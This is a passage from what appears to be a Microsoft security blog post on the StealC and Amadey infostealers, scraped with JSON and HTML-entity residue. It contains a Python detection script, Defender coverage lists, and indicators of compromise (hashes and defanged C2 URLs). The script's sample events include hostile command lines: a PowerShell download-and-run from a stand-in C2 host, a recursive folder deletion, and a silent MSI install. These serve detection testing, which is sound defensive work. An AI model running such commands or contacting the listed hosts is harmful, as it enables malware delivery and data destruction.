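    ProcEvent("ws01", "stealc.exe", "msiexec.exe",
              r'msiexec.exe /i "C:\ProgramData\upd.msi" /passive'),
    ProcEvent("ws01", "stealc.exe", "powershell.exe",
              'powershell -c "iwr http://c2.invalid/p.ps1 | iex"'),
    ProcEvent("ws01", "cmd.exe", "cmd.exe", r"cmd /C RMDIR /s/q C:\Users\bob\e079729711"),
    # Benign look-alikes that must not fire.
    ProcEvent("ws02", "explorer.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent("ws02", "explorer.exe", "msiexec.exe", r'msiexec.exe /i "C:\Users\amy\Downloads\7z.msi"'),
]

if __name__ == "__main__":
    for host, rule, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host}  {rule:22} {cmd}")
```

Treat hits as leads rather than verdicts: _msiexec /passive_ and _sc config ... start= auto_ occur in legitimate administration, so pivot on the parent process (a freshly dropped executable in a user profile directory spawning _rundll32.exe_ or _msiexec.exe_), the file path of the loaded DLL, and whether the account created in the _net localgroup_ event exists in any provisioning record.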
Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\n**Tactic**  | **Observed activity**  | **Microsoft Defender coverage**    \\n&#8212;|&#8212;|&#8212;  \\nPersistence| Threat actors distributed malware families| **Microsoft Defender Antivirus**   \\n- Trojan:Win32\/Amadey  \\n- Trojan:Win64\/Amadey  \\n- Trojan:MSIL\/Amadey  \\n- Trojan:PowerShell\/Amadey  \\n- Behavior:Win64\/Amadey  \\n- Behavior:Win32\/Amadey  \\n- TrojanDownloader:Win32\/Amadey  \\n- TrojanDownloader:Win64\/Amadey  \\n- TrojanDownloader:PowerShell\/Amadey  \\n- TrojanDownloader:MSIL\/Amadey  \\n- TrojanDownloader:Win64\/Stealc  \\n- TrojanDownloader:VBS\/StealC  \\n- TrojanDownloader:PowerShell\/StealC  \\n- TrojanDownloader:MSIL\/StealC  \\n- Trojan:Win64\/Stealc  \\n- Trojan:Win32\/Stealc  \\n- Trojan:MSIL\/Stealc  \\n- Behavior:Win64\/Stealc  \\n  \\n**Microsoft Defender for Endpoint**   \\n- \u2018Amadey\u2019 malware was prevented  \\n- \u2018StealC\u2019 malware was prevented  \\n- User account created under suspicious circumstances  \\n- New group added suspiciously  \\n- Information stealing malware activity  \\nImpact| Threat actors can deploy ransomware| **Microsoft Defender for Endpoint**   \\n- Ransomware-linked threat actor detected  \\n- A file or network connection related to a ransomware-linked emerging threat activity group detected    \\n  \\n### Microsoft Security Copilot\\n\\nMicrosoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.\\n\\nCustomers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:\\n\\n  * Threat 
Intelligence Briefing agent\\n  * Phishing Triage agent\\n  * Threat Hunting agent\\n  * Dynamic Threat Detection agent\\n\\n\\n\\nSecurity Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.\\n\\n### Threat intelligence reports\\n\\nMicrosoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n  * Tool profile: Amadey\\n  * Tool profile: StealC\\n  * Tool profile: Lumma Stealer\\n  * Tool profile: Information stealers\\n\\n\\n\\nMicrosoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.\\n\\n## Indicators of compromise\\n\\n**Indicator**| **Type**| **Description**  \\n&#8212;|&#8212;|&#8212;  \\n8f32456359f209a63adfd24b94235e1727382ac7f7bb7f2bcaf754e721925b64| SHA-256| StealC  \\n0215f734867bd71c57ff5c524d8cc670be5b4f1861b2c390cf46d18784a53624| SHA-256| StealC  \\n2a0f053855da59b3b56812e580d7baeba59fc9493694722aa9e3f121ee3363f1| SHA-256| StealC  \\n977b33a9b481cf714946b7d386865cd5d284312aa5ecfa0546c197b1003e1bde| SHA-256| StealC  \\nb7d1f172ff3feafe65d47fd1cbe0cc249316371ae0e1cbe3a7c741c738b3353d| SHA-256| Amadey 5.87  
\\n9383572a30ae5b76fadd0700fbd7a1aa7b05d0b6c8f9cdaef9b30a3e1f65d57d| SHA-256| Amadey 5.86  \\n5f5b25b2e35d404034d0d60975cf1ffbc6f141761ec3f4f15d6f7c6213a056f6| SHA-256| Amadey 5.80  \\n98e504cc7125b79eda5491f40b998605a05f4cd968b961aab4cce7beb074fefe| SHA-256| Amadey 5.78  \\n30cef3d3d956e83e2c50579cfbe57a49159cccbcc8b0b0422f27d55e1c401ad9| SHA-256| Amadey 5.77  \\n8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea| SHA-256| Amadey 5.73  \\n99507f18c4e61fdb109805404bf6a79ea8ce2fddc590ce48d717e97516ab7e8d| SHA-256| Amadey 5.70  \\n1246c5b89ab668c1137f377507bc3e266a98e93248382aa026610ae1e764a497| SHA-256| Amadey 5.65  \\nd43c988d6f9cb355497696b580621fb1bdb7b6ed6d90f97520ecf6da5a1a41ff| SHA-256| Amadey 5.64  \\nca4d4c4fc3e5d5cfa922b898f2d7411f03a446dddb139ba45dfd4f8f0018b64f| SHA-256| Amadey 5.63  \\n43455f1ff4a623b783da670d052eb77eaaacb0c66a9f1e8508f802bf22e8129e| SHA-256| Amadey 5.60  \\n _hxxp:\/\/polse[.]us\/62ea47cac2534aa18f74.php_| C2 URL| StealC C2  \\n _hxxp:\/\/roger99699[.]xyz\/425f1faf4b214434b8a3.php_| C2 URL| StealC C2  \\n _hxxp:\/\/bluescry[.]com\/01f96fd710e905ca2326.php_| C2 URL| StealC C2  \\n _hxxp:\/\/secure.controlpanel[.]asia\/330311481fe14ab99814.php_| C2 URL| StealC C2  \\n _hxxps:\/\/neltron-geltron[.]shop\/e396586b99ee49d19cc3.php_| C2 URL| StealC C2  \\n _hxxp:\/\/cdntestconnect[.]com\/ed54b97a570943999715.php_| C2 URL| StealC C2  \\n _hxxps:\/\/bartsen284[.]online\/39d9612df78e45b5a4bb.php_| C2 URL| StealC C2  \\n _hxxp:\/\/goodpanelforgoodjob[.]com\/hg8jjfSr5hy\/index.php_| C2 URL| Amadey C2  \\n _hxxp:\/\/rebustan[.]top\/gd7djkDveE2\/index.php_| C2 URL| Amadey C2  \\n _hxxp:\/\/svclsc[.]com\/ms\/index.php_| C2 URL| Amadey C2  \\n _hxxp:\/\/microsoft-telemetry[.]at\/cvdfnaFJBmC0\/index.php_| C2 URL| Amadey C2  \\n _hxxp:\/\/spasopro[.]at\/Lsge63sd3\/index.php_| C2 URL| Amadey C2  \\n  \\n### References\\n\\n  * Amadey Exploiting Self-Hosted GitLab to Distribute StealC (Trellix)\\n  * HELLCAT Ransomware Group Strikes Again: Four New Victims Breached via Jira Credentials from Infostealer Logs (InfoStealers by Hudson Rock)\\n  * The Infostealer Pipeline: How Russian Market Fuels Credential-Based Attacks (ReliaQuest)\\n  * Stealer Logs and Corporate Access (Flare)\\n\\n\\n\\n### Learn more\\n\\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n\\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n\\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.\\n\\nThe post StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them appeared first on Microsoft Security Blog.&#8221;,&#8221;published&#8221;:&#8221;2026-06-24T12:30:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-24T12:30:00&#8243;,&#8221;type&#8221;:&#8221;mssecure&#8221;,&#8221;title&#8221;:&#8221;StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver 
them&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSSECURE:60CA4794B9C1C6FE86B9F6D8449FB809&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/06\/24\/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221
;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-65365","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"]}